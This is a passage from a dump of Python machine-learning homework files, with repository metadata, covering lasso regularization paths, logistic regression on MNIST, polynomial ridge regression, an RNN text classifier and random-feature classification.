elif c_k > reg_lambda:\n w[k] = (c_k- reg_lambda)/a[k]\n else:\n w[k] = 0\n \n # sanity check\n obj_val = np.sum( (train_x.dot(w) + b - train_y)**2 )+ np.sum(reg_lambda * np.absolute(w))\n objective_val_l.append(obj_val)\n \n w_updates.append(np.array(w)) # append the updated w\n b = (1/n)*np.sum( train_y - train_x.dot(w))\n b_l.append(b)\n# print(w_updates)\n# print(b_l)\n if len(w_updates) > 2: # TODO: maximum \n print(\"w_updates \", len(w_updates))\n# print(\"w_update \", w - w_prev)\n# print(\"w_update: \", w_updates[-1]-w_updates[-3])\n max_update = np.max(w_updates[-1]-w_updates[-2])\n print(\"maximum update \", max_update)\n if max_update == 0: # skip zero weight matrix\n break\n w_prev = w\n \n \n solution_weights.append(w)\n # keep track of number of nonzero for each solution\n num_nonzero = np.sum(w != 0)\n num_nonzero_l.append(num_nonzero)\n \n \n # error record\n squared_train_err = np.sum( (train_x.dot(w) + b - train_y)**2 )/n\n squared_train_err_l.append(squared_train_err)\n squared_test_err = np.sum( (test_x.dot(w) + b - test_y)**2 )/m\n squared_test_err_l.append(squared_test_err)\n \n # regularization 
lambda\n reg_lambda = reg_lambda*0.5\n reg_lambda_l.append(reg_lambda)\n print(\"new lambda: \", reg_lambda)\n\n\n# In[23]:\n\n\n# sanity check continue\ncount = 0\nfor i in range(1,len(objective_val_l)):\n if objective_val_l[i-1] < objective_val_l[i]:\n count += 1\nprint(\"number of wrong optimization: \" , count)\nprint(objective_val_l)\n\n\n# In[34]:\n\n\nfrom matplotlib import pyplot as plt\nreg_lambda_0 = max(reg_lambda_l)\n\nplt.plot(reg_lambda_l[:-1], num_nonzero_l)\nplt.xscale(\"log\")\nplt.xlim(reg_lambda_0, 1e-2) \nplt.xlabel(\"reg_lambda\")\nplt.ylabel(\"number of nonzero\")\nplt.savefig(\"A5a\")\nplt.show()\n\n\n# In[79]:\n\n\ndef get_feature_weight_update(ws, feature, var_d):\n feature_updates = [w[var_d[feature]] for w in ws]\n return feature_updates\n \nvar_d[\"agePct12t29\"]\n\nvar_query = [\"agePct12t29\", \"pctWSocSec\", \"pctUrban\", \"agePct65up\",\"householdsize\"]\n\nfeature1_updates = get_feature_weight_update(solution_weights, var_query[0], var_d)\nfeature2_updates = get_feature_weight_update(solution_weights, var_query[1], var_d)\nfeature3_updates = get_feature_weight_update(solution_weights, var_query[2], var_d)\nfeature4_updates = get_feature_weight_update(solution_weights, var_query[3], var_d)\nfeature5_updates = get_feature_weight_update(solution_weights, var_query[4], var_d)\nplt.plot(reg_lambda_l, feature1_updates, label = \"agePct12t29\")\nplt.plot(reg_lambda_l, feature2_updates, label = \"pctWSocSec\")\nplt.plot(reg_lambda_l, feature3_updates, label = \"pctUrban\")\nplt.plot(reg_lambda_l, feature4_updates, label = \"agePct65up\")\nplt.plot(reg_lambda_l, feature5_updates, label = \"householdsize\")\nplt.xlabel(\"lambda\")\nplt.ylabel(\"feature weights\")\nplt.xlim(reg_lambda_l[0], reg_lambda_l[-1])\nplt.xscale(\"log\")\nplt.legend()\nplt.savefig(\"A5b\")\nplt.show()\n\n\n# In[77]:\n\n\n\nplt.plot(reg_lambda_l[1:], squared_train_err_l[1:], label = \"train\")\nplt.plot(reg_lambda_l[1:], squared_test_err_l[1:], label = \"test\")\nplt.xlim(reg_lambda_l[0], reg_lambda_l[-1]) # flip x axis\nplt.xlabel(\"lambda\")\nplt.ylabel(\"squared error\")\nplt.xscale(\"log\")\nplt.legend()\nplt.savefig(\"A5c\")\nplt.show()\n\n"
},
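The inner coordinate update in both lasso scripts is the standard soft-thresholding rule; the three-way `if/elif/else` above can be factored into one reusable function. A minimal sketch (the helper name is hypothetical; `c_k`, `lam`, and `a_k` are the same quantities as in the loop above):

```python
def soft_threshold_update(c_k, lam, a_k):
    # coordinate-descent lasso update:
    #   w_k = (c_k + lam)/a_k if c_k < -lam,
    #         (c_k - lam)/a_k if c_k >  lam,
    #         0 otherwise
    if c_k < -lam:
        return (c_k + lam) / a_k
    if c_k > lam:
        return (c_k - lam) / a_k
    return 0.0

print(soft_threshold_update(3.0, 1.0, 2.0))   # 1.0
print(soft_threshold_update(0.5, 1.0, 2.0))   # 0.0
```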
{
"alpha_fraction": 0.614313006401062,
"alphanum_fraction": 0.6353455185890198,
"avg_line_length": 28.516128540039062,
"blob_id": "4a932d9f0199811d42acba62f3459b3bccb3683b",
"content_id": "258d81f6f219a4c646f1029e034e4aca481d7a0a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3661,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 124,
"path": "/CSE546hw2/binary_logistic_reg_GD.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[20]:\n\n\nfrom mnist import MNIST\nimport numpy as np\ndef load_dataset():\n mndata = MNIST(\"./data/python-mnist/data/\")\n \n X_train, labels_train = map(np.array, mndata.load_training())\n kept_entries_pos1 = (labels_train == 2) + (labels_train == 7)\n X_train = X_train[kept_entries_pos1]\n labels_train = labels_train[kept_entries_pos1]\n labels_train = labels_train.astype(int)\n labels_train[labels_train == 7] = 1\n labels_train[labels_train == 2] = -1\n\n \n \n X_test, labels_test = map(np.array, mndata.load_testing())\n kept_entries_pos2 = (labels_test == 2) + (labels_test == 7)\n X_test = X_test[kept_entries_pos2]\n labels_test = labels_test[kept_entries_pos2]\n labels_test = labels_test.astype(int)\n labels_test[labels_test == 7] = 1\n labels_test[labels_test == 2] = -1\n # normalization to [0,1]\n X_train = X_train/255.0 \n X_test = X_test/255.0\n return X_train, labels_train, X_test, labels_test\nX_train, labels_train, X_test, labels_test = load_dataset()\n\n\n# In[21]:\n\n\n##### import math\nn, d= X_train.shape\n\nm = X_test.shape[0]\n\n# w = np.zeros(d)\nnew_w = np.zeros(d)\nw_gradient = np.zeros(d)\n# b = 0\nnew_b = 0\nb_gradient = 0\nlearning_rate = 0.001\n\nreg_lambda = 0.1\n\nloss_on_training = []\nloss_on_testing = []\n\nloss_sum = 0\n\nmisclass_on_training = []\nmisclass_on_testing = []\n\n\n\n# TODO: while not converge\ncount = 0\nmetStopCondition = False\nwhile not metStopCondition:\n w = np.copy(new_w)\n b = np.copy(new_b)\n \n y_pred = b + X_train.dot(w)\n u = 1/(1+ np.exp(-labels_train*(y_pred)))\n w_gradient = (1/n)*np.sum((1-u)*(-labels_train*X_train.T), axis = 1) + 2*reg_lambda*w\n\n b_gradient = (1/n)*np.sum((1-u)*(-labels_train))\n \n # gradient descent update on the whole dataset, therefore we don't have to update each step\n new_w -= w_gradient * learning_rate\n new_b -= b_gradient * learning_rate\n \n training_loss = (1/n) * np.sum( np.log(1+ np.exp(-labels_train*(b+X_train.dot(w)) )) + reg_lambda * np.linalg.norm(w, 2))\n loss_on_training.append(training_loss)\n testing_loss = (1/m) * np.sum( np.log(1+ np.exp(-labels_test*(b+X_test.dot(w)) )) + reg_lambda * np.linalg.norm(w, 2))\n loss_on_testing.append(testing_loss)\n \n num_incor_class_training = np.sum( labels_train !=( np.sign(b+ X_train.dot(w) ) ) ) \n num_incor_class_testing = np.sum( labels_test != ( np.sign(b + X_test.dot(w) ) ))\n# print(\"num_incor_class_training: \", num_incor_class_training)\n misclass_on_training.append( num_incor_class_training /n )\n misclass_on_testing.append(num_incor_class_testing/m)\n# print(new_w)\n# print(w)\n# break\n \n # Stop condition check\n # 1e-4\n metStopCondition = new_b - b < 1e-4 and np.linalg.norm(new_w - w, 2) < 1e-4\n# print(\"new_b - b\", new_b - b)\n# print(\"np.linalg.norm(new_w - w, 2) \", np.linalg.norm(new_w - w, 2) )\n# print(\"loss: \", loss_on_training[-1])\n\n\n# In[22]:\n\n\nfrom matplotlib import pyplot as plt\n\nplt.plot(range(len(loss_on_training)), loss_on_training, label = \"training loss\")\nplt.plot(range(len(loss_on_training)), loss_on_testing, label = \"testing loss\")\nplt.xlabel(\"number of iteration\")\nplt.ylabel(\"loss\")\nplt.legend()\n# plt.show()\nplt.savefig(\"A6b(i)\")\nplt.show()\n\n\nplt.plot(range( len(misclass_on_training)-1), misclass_on_training[1:], label = \"misclassification rate on training dataset\")\nplt.plot(range(len(misclass_on_training)-1), misclass_on_testing[1:], label = \"misclassification rate on test dataset\")\nplt.xlabel(\"number of 
iteration\")\nplt.ylabel(\"misclassification rate\")\nplt.legend()\nplt.savefig(\"A6b(ii)\")\nplt.show()\n\n"
},
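Both logistic-regression scripts compute the loss as `np.log(1 + np.exp(-m))`, which overflows to `inf` once the margin `m` is a large negative number. A numerically stable drop-in sketch using `np.logaddexp`, with the same variable roles as above:

```python
import numpy as np

def stable_logistic_loss(w, b, X, y, lam):
    # log(1 + exp(-m)) == logaddexp(0, -m), evaluated without overflow
    margins = y * (b + X.dot(w))
    return np.mean(np.logaddexp(0.0, -margins)) + lam * np.dot(w, w)

rng = np.random.default_rng(0)
X, y = rng.normal(size=(10, 3)), np.sign(rng.normal(size=10))
print(stable_logistic_loss(1000 * np.ones(3), 0.0, X, y, 0.0))  # finite, no warning
```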
{
"alpha_fraction": 0.49978241324424744,
"alphanum_fraction": 0.5119669437408447,
"avg_line_length": 28.461538314819336,
"blob_id": "817d8cd87d5c1ecdc73fa44d710551c14399f8b5",
"content_id": "c681b4aede14057b6e37056b8ee3bf9b4e3275e1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4596,
"license_type": "no_license",
"max_line_length": 131,
"num_lines": 156,
"path": "/hw1/code/polyreg.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "'''\n Template for polynomial regression\n AUTHOR Eric Eaton, Xiaoxiang Hu\n'''\n\nimport numpy as np\nimport math\n\n#-----------------------------------------------------------------\n# Class PolynomialRegression\n#-----------------------------------------------------------------\n\nclass PolynomialRegression:\n\n def __init__(self, degree=1, reg_lambda=1e-6):\n \"\"\"\n Constructor\n \"\"\"\n #TODO\n self.degree = degree\n self.reg_lambda = reg_lambda\n self.theta = None\n self.featureMean = None\n self.featureStd= None\n\n def polyfeatures(self, X, degree):\n \"\"\"\n Expands the given X into an n * d array of polynomial features of\n degree d.\n\n Returns:\n A n-by-d numpy array, with each row comprising of\n X, X * X, X ** 3, ... up to the dth power of X.\n Note that the returned matrix will not include the zero-th power.\n\n Arguments:\n X is an n-by-1 column numpy array\n degree is a positive integer\n \"\"\"\n #TODO\n n = X.shape[0]\n zero_matrix = np.zeros((n, degree))\n zero_matrix[:, 0] = X.reshape(n)\n X = zero_matrix\n for d in range(1, degree + 1):\n X[:, d - 1] = np.power(X[:, 0], d)\n return X\n\n\n\n def fit(self, X, y):\n \"\"\"\n Trains the model\n Arguments:\n X is a n-by-1 array\n y is an n-by-1 array\n Returns:\n No return value\n Note:\n You need to apply polynomial expansion and scaling\n at first\n \"\"\"\n #TODO\n X = self.polyfeatures(X, self.degree)\n self.featureMean = X.mean(axis = 0)\n self.featureStd = np.std(X,axis = 0)\n\n # data standarzation\n X = (X - self.featureMean)/ self.featureStd\n\n\n # old\n # add 1s column\n n = len(X)\n X_ = np.c_[np.ones([n, 1]), X]\n\n n, d = X_.shape\n d = d-1 # remove 1 for the extra column of ones we added to get the original num features\n\n # construct reg matrix\n reg_matrix = self.reg_lambda * np.eye(d + 1)\n reg_matrix[0, 0] = 0\n\n # analytical solution (X'X + regMatrix)^-1 X' y\n self.theta = np.linalg.pinv(X_.T.dot(X_) + reg_matrix).dot(X_.T).dot(y)\n\n\n def predict(self, X):\n \"\"\"\n Use the trained model to predict values for each instance in X\n Arguments:\n X is a n-by-1 numpy array\n Returns:\n an n-by-1 numpy array of the predictions\n \"\"\"\n # TODO\n # standardize data\n X = self.polyfeatures(X, self.degree)\n X = (X - self.featureMean) / self.featureStd\n\n\n # copied code\n n = len(X)\n\n # add 1s column\n X_ = np.c_[np.ones([n, 1]), X]\n print(\"reg_lambda: \", self.reg_lambda, \" model theta L2 norm: \", np.linalg.norm(self.theta, 2))\n return X_.dot(self.theta)\n\n#-----------------------------------------------------------------\n# End of Class PolynomialRegression\n#-----------------------------------------------------------------\n\n\n\ndef learningCurve(Xtrain, Ytrain, Xtest, Ytest, reg_lambda, degree):\n \"\"\"\n Compute learning curve\n\n Arguments:\n Xtrain -- Training X, n-by-1 matrix\n Ytrain -- Training y, n-by-1 matrix\n Xtest -- Testing X, m-by-1 matrix\n Ytest -- Testing Y, m-by-1 matrix\n regLambda -- regularization factor\n degree -- polynomial degree\n\n Returns:\n errorTrain -- errorTrain[i] is the training accuracy using\n model trained by Xtrain[0:(i+1)]\n errorTest -- errorTrain[i] is the testing accuracy using\n model trained by Xtrain[0:(i+1)]\n\n Note:\n errorTrain[0:1] and errorTest[0:1] won't actually matter, since we start displaying the learning curve at n = 2 (or higher)\n \"\"\"\n\n n = len(Xtrain)\n m = len(Xtest)\n\n errorTrain = np.zeros(n)\n errorTest = np.zeros(n)\n\n #TODO -- complete rest of method; errorTrain and errorTest are already the correct 
shape\n\n for i in range(n):\n if i < 3: # ignore the zero-th case\n errorTrain[i] = 0\n errorTest[i] = 0\n else:\n model = PolynomialRegression(degree, reg_lambda)\n model.fit(Xtrain[:i+1], Ytrain[:i+1]) # i = 3, model training on sample 0,1,2\n errorTrain[i] =(1/i) * np.sum((Ytrain[:i] - model.predict(Xtrain[:i])) ** 2)\n errorTest[i] = (1/m) * np.sum((Ytest - model.predict(Xtest)) ** 2)\n\n return errorTrain, errorTest\n"
},
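`polyreg.py` above defines the class but no driver. A hypothetical smoke test showing how `PolynomialRegression` is meant to be used; it assumes the file is importable as `polyreg`, and the data here is synthetic:

```python
import numpy as np
from polyreg import PolynomialRegression  # assumes polyreg.py is on the path

rng = np.random.default_rng(0)
X = np.linspace(-1, 1, 40).reshape(-1, 1)
y = np.sin(2 * np.pi * X).ravel() + 0.1 * rng.normal(size=40)

model = PolynomialRegression(degree=8, reg_lambda=1e-4)
model.fit(X, y)            # expands to degree-8 features, standardizes, solves
preds = model.predict(X)   # re-applies the stored mean/std before predicting
print("train MSE:", np.mean((preds - y) ** 2))
```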
{
"alpha_fraction": 0.5467332005500793,
"alphanum_fraction": 0.5685117840766907,
"avg_line_length": 20.086124420166016,
"blob_id": "bc930937908a6390256aa2ec6d2207f24d121842",
"content_id": "19c14eea60c6054729a3a0825e5e3b57e94af9d2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4408,
"license_type": "no_license",
"max_line_length": 99,
"num_lines": 209,
"path": "/CSE546hw2/lasso.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[9]:\n\n\nimport sys\nimport numpy as np\n\n\n# In[10]:\n\n\n# TODO: is the 0 weights random or just with index larger than k\nn = 500\nd = 1000\nk = 100\nsigma = 1\n\n\ntrain_x = np.random.normal(0,1, (n,d))\n\n\n# use two np arange?\nnon_empty_weights = np.arange(k)\n# w = np.zeros(d) # initial weights ready for training\ntrue_w = np.zeros(d)\ntrue_w[non_empty_weights] = 1 # it's only for generating data\nw = np.zeros(d)\nprint(w.shape)\n\ntrain_y = train_x.dot(true_w) + np.random.normal(0,1, n)\n\nprint(train_x)\nprint(train_y)\n\n\n# In[31]:\n\n\na = np.array([0.0])\n\nnp.count_nonzero(a)\n\n\n# In[48]:\n\n\n# TODO: regularization path\n# it updates values column by column and each time use all data\n\n\nreg_lambda_l = []\n# initialize lambda\nfor k in range(d):\n reg_lambda = 2*np.abs(np.sum(train_x[:,k] *(train_y-np.average(train_y)) ,axis=0))\n reg_lambda_l.append(reg_lambda)\nreg_lambda = max(reg_lambda_l)\n\nprint(\"max_lambda: \", reg_lambda)\n\n\nnum_nonzero_l = []\nreg_lambda_l = []\nreg_lambda_l.append(reg_lambda)\n\nobjective_val_l = []\n\nFDR_l = []\nTPR_l = []\ntrue_k = 100\n\n\nw_updates = [np.zeros(d)] # initialize how much w_updates\nw_prev = np.zeros(d)\nb_l = [(1/n)*np.sum( train_y - train_x.dot(w))]\nwhile reg_lambda > 1e-2: # TODO\n max_update = sys.maxsize\n# # for each lambda solution, compute w from zero vector\n# w_prev = np.zeros(d)\n w = w_updates[-1]\n w = w_prev\n b = b_l[-1]\n \n count = 0\n \n while max_update >= 0.05: # condition for not converge\n # pre-compute a\n # as a is fixed and solely depends on X\n a = 2*np.sum(train_x**2, axis = 0) # axis = 0 by default\n # print(a.shape)\n for k in range(d):\n excluded_train_x = np.delete(train_x, k, axis = 1)\n excluded_w = np.delete(w, k)\n # calculate the cost\n c_k = 2*np.sum(train_x[:,k]*(train_y- (b+ excluded_train_x.dot(excluded_w)) ) )\n # update weights\n if c_k < -reg_lambda:\n w[k]= (c_k+reg_lambda)/a[k]\n elif c_k > reg_lambda:\n w[k] = (c_k- reg_lambda)/a[k]\n else:\n w[k] = 0\n \n # sanity check\n obj_val = np.sum( (train_x.dot(w) + b - train_y)**2 )+ np.sum(reg_lambda * np.absolute(w))\n objective_val_l.append(obj_val)\n \n w_updates.append(np.array(w)) # append the updated w\n b = (1/n)*np.sum( train_y - train_x.dot(w))\n b_l.append(b)\n\n if len(w_updates) > 2: # TODO: maximum \n print(\"w_updates \", len(w_updates))\n max_update = np.max(w_updates[-1]-w_updates[-2])\n print(\"maximum update \", max_update)\n if max_update == 0: # skip zero weight matrix\n break\n w_prev = w\n# correct_num_nonzero = np.sum((w != 0) * (true_w != 0))\n k = 100\n correct_num_nonzero = np.sum( w[:k] != 0)\n \n# print(\"w: \", w)\n# print(\"true_w\", true_w)\n print(\"correct_num_nonzero: \", correct_num_nonzero)\n count += 1\n if count >= 10:\n break\n \n incor_num_nonzero = np.sum( w[k:] != 0 )\n \n # keep track of number of nonzero for each solution\n num_nonzero = np.sum(w != 0)\n num_nonzero_l.append(num_nonzero)\n # FDR\n if num_nonzero == 0:\n # invalid number of nonzero\n FDR_l.append(0.0)\n else:\n FDR_l.append(incor_num_nonzero/num_nonzero)\n # TPR\n TPR_l.append(correct_num_nonzero/true_k)\n \n# print(\"FDR_l \", FDR_l)\n# print(\"TPR_l: \", TPR_l)\n# break\n \n # regularization lambda\n reg_lambda = reg_lambda*0.5\n reg_lambda_l.append(reg_lambda)\n print(\"new lambda: \", reg_lambda)\n\n\n# In[13]:\n\n\n# sanity check continue\ncount = 0\nfor i in range(1,len(objective_val_l)):\n if objective_val_l[i-1] < objective_val_l[i]:\n count += 
1\nprint(\"number of wrong optimization: \" , count)\nprint(objective_val_l)\n\n\n# In[22]:\n\n\nfrom matplotlib import pyplot as plt\nreg_lambda_0 = max(reg_lambda_l)\nplt.plot(reg_lambda_l[:-1], num_nonzero_l)\nplt.xscale(\"log\")\n# plt.xlim(reg_lambda_0, 1e-2) \nplt.xlim(1e-2, reg_lambda_0) \nplt.xlabel(\"reg_lambda\")\nplt.ylabel(\"number of nonzero\")\nplt.savefig(\"A4a\")\nplt.show()\n\n\n# In[42]:\n\n\nlen(w_updates)\n\n\n# In[16]:\n\n\nprint(reg_lambda_l)\n\n\n# In[45]:\n\n\nprint(FDR_l)\n\nprint(TPR_l)\n\n\n# In[49]:\n\n\nplt.plot(FDR_l, TPR_l)\nplt.xlabel(\"FDR\")\nplt.ylabel(\"TPR\")\nplt.savefig(\"A4b\")\nplt.show()\n\n"
},
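The `lambda_max` initialization above loops over all `d` features; the same quantity, `max_k 2|x_k^T (y - ybar)|`, can be computed in one vectorized expression. A sketch on synthetic data shaped like the experiment above (n=500, d=1000, k=100):

```python
import numpy as np

rng = np.random.default_rng(0)
n, d, k = 500, 1000, 100
X = rng.normal(size=(n, d))
y = X[:, :k].sum(axis=1) + rng.normal(size=n)  # first k features carry signal

# vectorized lambda_max: the smallest lambda for which w = 0 is optimal
lam_max = np.max(2.0 * np.abs(X.T.dot(y - y.mean())))
print(lam_max)
```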
{
"alpha_fraction": 0.6178369522094727,
"alphanum_fraction": 0.6311541795730591,
"avg_line_length": 38.02362060546875,
"blob_id": "1b0f8fd7bcbe1e0135ef51f73bf1a21c5a2d02cb",
"content_id": "e1291be963ca165c8325b0150b223d4a07e8eba9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4956,
"license_type": "no_license",
"max_line_length": 126,
"num_lines": 127,
"path": "/hw4/a6_RNN/hw4_a6.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "import torch\nimport torch.nn as nn\nfrom docutils.nodes import target\n\n\ndef tuple2tensor(tuple):\n tensor = None\n for t in tuple:\n if tensor == None:\n tensor = torch.unsqueeze(t, dim=0)\n else:\n t = torch.unsqueeze(t, dim=0)\n tensor = torch.cat((tensor, t), dim=0)\n return tensor\n\ndef collate_fn(batch):\n \"\"\"\n Create a batch of data given a list of N sequences and labels. Sequences are stacked into a single tensor\n of shape (N, max_sequence_length), where max_sequence_length is the maximum length of any sequence in the\n batch. Sequences shorter than this length should be filled up with 0's. Also returns a tensor of shape (N, 1)\n containing the label of each sequence.\n\n :param batch: A list of size N, where each element is a tuple containing a sequence tensor and a single item\n tensor containing the true label of the sequence.\n\n :return: A tuple containing two tensors. The first tensor has shape (N, max_sequence_length) and contains all\n sequences. Sequences shorter than max_sequence_length are padded with 0s at the end. The second tensor\n has shape (N, 1) and contains all labels.\n \"\"\"\n sentences, labels = zip(*batch)\n\n # get maximum number of sequence length\n max_sequence_length = -1\n for sent in sentences:\n temp_len = sent.shape[0]\n if temp_len > max_sequence_length:\n max_sequence_length = temp_len\n pad_t = torch.tensor([0])\n padded_sents = []\n # print(max_sequence_length)\n t1 = None\n t2 = labels\n for i in range(len(sentences)): # pad each sent\n cur_sent_t = sentences[i]\n num_pad = max_sequence_length - cur_sent_t.shape[0]\n padded_t = torch.cat( (cur_sent_t, pad_t.repeat(num_pad) ) )\n if t1 is None:\n t1 = torch.unsqueeze(padded_t, 0)\n else:\n\n padded_t = torch.unsqueeze(padded_t, 0)\n # print(\"t1 shape \", t1.shape)\n # print(\"padded_t shape \", padded_t.shape)\n t1 = torch.cat( (t1, padded_t), dim = 0 )\n t2 = tuple2tensor(t2)\n return t1, t2\n\n\nclass RNNBinaryClassificationModel(nn.Module):\n def __init__(self, embedding_matrix):\n super().__init__()\n\n vocab_size = embedding_matrix.shape[0]\n embedding_dim = embedding_matrix.shape[1]\n # Construct embedding layer and initialize with given embedding matrix. Do not modify this code.\n self.embedding = nn.Embedding(num_embeddings=vocab_size, embedding_dim=embedding_dim, padding_idx=0)\n self.embedding.weight.data = embedding_matrix\n\n self.output_size = 1\n self.hidden_dim = 64\n self.n_layers = 1\n # self.N = 50 # N is number of sequences which are batch size\n self.rnn = nn.RNN(input_size=embedding_dim, hidden_size=self.hidden_dim, num_layers=self.n_layers, batch_first = True)\n self.fc = nn.Linear(self.hidden_dim, self.output_size)\n self.criterion = nn.BCELoss()\n self.sm = nn.Sigmoid()\n\n def forward(self, inputs):\n \"\"\"\n Takes in a batch of data of shape (N, max_sequence_length). 
Returns a tensor of shape (N, 1), where each\n element corresponds to the prediction for the corresponding sequence.\n :param inputs: Tensor of shape (N, max_sequence_length) containing N sequences to make predictions for.\n :return: Tensor of predictions for each sequence of shape (N, 1).\n \"\"\"\n # inputs -> embedding\n embedding_input = self.embedding(inputs) # inputs shape 2 x 30\n\n batch_size = embedding_input.size(0)\n _, hidden= self.rnn(embedding_input) # GRU or GPU\n # _, (hidden, _) = self.rnn(embedding_input) # output 2 x max_seq_length x 64 # LSTM\n hidden = torch.squeeze(hidden)\n out = self.fc(hidden)\n out = self.sm(out)\n return out\n\n def loss(self, logits, targets):\n \"\"\"\n Computes the binary cross-entropy loss.\n :param logits: Raw predictions from the model of shape (N, 1)\n :param targets: True labels of shape (N, 1)\n :return: Binary cross entropy loss between logits and targets as a scalar tensor.\n \"\"\"\n return self.criterion(logits, targets.float())\n\n\n def accuracy(self, logits, targets):\n \"\"\"\n Computes the accuracy, i.e number of correct predictions / N.\n :param logits: Raw predictions from the model of shape (N, 1)\n :param targets: True labels of shape (N, 1)\n :return: Accuracy as a scalar tensor.\n \"\"\"\n num_correct = 0\n for i in range(len(logits)):\n pred = torch.round(logits[i])\n if pred == targets[i]:\n num_correct += 1\n return torch.tensor(num_correct*1.0/len(logits))\n\n\n# Training parameters\nTRAINING_BATCH_SIZE = 32\nNUM_EPOCHS = 5\nLEARNING_RATE = 5e-5 # 0.001 acc went down\n\n# Batch size for validation, this only affects performance.\nVAL_BATCH_SIZE = 128\n"
},
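The manual padding loop in `collate_fn` above (finding `max_sequence_length`, repeating a pad tensor, concatenating) is what `torch.nn.utils.rnn.pad_sequence` does in one call. A sketch of an equivalent collate function, keeping the same `(sequence, label)` batch contract as above:

```python
import torch
from torch.nn.utils.rnn import pad_sequence

def collate_fn(batch):
    # pad_sequence stacks variable-length 1-D index tensors into a single
    # (N, max_sequence_length) tensor, padding the tail of short ones with 0
    sentences, labels = zip(*batch)
    padded = pad_sequence(sentences, batch_first=True, padding_value=0)
    return padded, torch.stack(labels, dim=0)  # labels -> (N, 1)
```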
{
"alpha_fraction": 0.5935471057891846,
"alphanum_fraction": 0.6063348650932312,
"avg_line_length": 31.33121109008789,
"blob_id": "536dfe6f27fed3984313f55d81f5cd24a814d5aa",
"content_id": "f067d6a856ba75859939db6c2984ed0def3e7407",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5083,
"license_type": "no_license",
"max_line_length": 113,
"num_lines": 157,
"path": "/hw1/ridgeRegression/imageClassify2.py",
"repo_name": "feipenghe/ml_hw",
"src_encoding": "UTF-8",
"text": "\nfrom mnist import MNIST\nimport numpy as np\nimport math\nfrom matplotlib import pyplot as plt\n\nclass ImageClassification:\n\n\n def __init__(self, p = 100, reg_lambda = 1e-4):\n self.p = p\n self.reg_lambda = reg_lambda\n self.G = None\n self.b = None\n self.W = None\n\n def train(self, X, X_labels, reg_lambda=0):\n # TODO: polyfeature + normalization?\n # X = self.pFeature(X)\n n = X.shape[1]\n Y = np.eye(10)[X_labels]\n\n # analytical solution\n self.W = np.linalg.pinv(X.T.dot(X) + np.multiply(self.reg_lambda, np.eye(n))).dot(X.T).dot(Y)\n\n\n\n def predict(self, h):\n predictions = np.eye(10).T.dot(self.W.T).dot(h.T)\n return predictions\n\n\n\n def pFeature(self, X_train, X_test, new=True):\n train_idx = len(X_train)\n X = np.concatenate( (X_train, X_test), axis = 0)\n n, d = X.shape\n if new:\n # if self.G is None:\n self.G = np.random.normal(0, 0.3162, size=(self.p, d)) # sigma^2 = 0.1, tae a approximate value here\n # if self.b is None:\n self.b = np.random.uniform(0, math.pi, size=(n, self.p))\n h = np.cos(X.dot(self.G.T) + self.b)\n h_train = h[:train_idx]\n h_test = h[train_idx:]\n return h_train, h_test\n\n\n\n\ndef load_dataset():\n mndata = MNIST(\"./python-mnist/data/\")\n X_train, labels_train = map(np.array, mndata.load_training())\n X_test, labels_test = map(np.array, mndata.load_testing())\n X_train = X_train / 255.0\n X_test = X_test / 255.0\n return X_train, labels_train, X_test, labels_test\n\n\n\ndef plotLearningCurve(errorTrain, errorTest, ps, regLambda):\n \"\"\"\n plot computed learning curve\n \"\"\"\n minX = 0\n maxY = max(errorTest)\n\n xs = np.arange(len(errorTrain))\n plt.plot(ps, errorTrain, 'r-o')\n plt.plot(ps, errorTest, 'b-o')\n plt.plot(ps, np.ones(len(xs)), 'k--')\n plt.legend(['Training Error', 'Validation Error'], loc='best')\n plt.title('Learning Curve (lambda='+str(regLambda)+')')\n plt.xlabel('p value')\n plt.ylabel('Error')\n plt.yscale('log')\n plt.ylim(top=maxY)\n # plt.xlim((minX, 10))\n plt.show()\n\n\ndef splitTrainValidation(X, X_labels):\n n = len(X)\n indices = np.random.permutation(n)\n training_idx_num = int(n * 0.8)\n training_idx, validation_idx = indices[:training_idx_num], indices[training_idx_num:]\n training_data = X[training_idx, :]\n training_labels = X_labels[training_idx]\n val_data = X[validation_idx, :]\n val_labels = X_labels[validation_idx]\n return training_data, training_labels, val_data, val_labels\n\ndef hoeffding( num_samples, num_correct, a= 0, b= 1, delta = 0.05):\n rhs = math.sqrt( (b-a)**2*math.log(2/delta, math.e)/(2* num_samples) )\n mu_conf_interval = ( -rhs+test_error , rhs+test_error )\n return mu_conf_interval\n\n\nif __name__ == '__main__':\n\n\n X_train, labels_train, X_test, labels_test = load_dataset()\n\n ps = np.arange(500,3000, 500) # p values\n train_errors = np.zeros(len(ps)) # training error place holder\n val_errors = np.zeros(len(ps))\n idx = 0\n reg_lambda = 1e-4\n\n models = []\n\n\n # for loop\n for p in ps:\n model = ImageClassification(p)\n # feature transform, each model create a new p feature\n X_train_h, X_test_p = model.pFeature(X_train, X_test) # when transform features\n # split train and validation dataset\n X_train_h, labels_train_h, X_val_h, val_labels = splitTrainValidation(X_train_h, labels_train)\n\n\n w = model.train(X_train_h, labels_train_h, reg_lambda)\n\n\n # training error\n prediction_train = model.predict(X_train_h)\n prediction_train = np.argmax(prediction_train, axis=0)\n train_errors[idx] = 1 - np.sum(labels_train_h == np.array(prediction_train)) / 
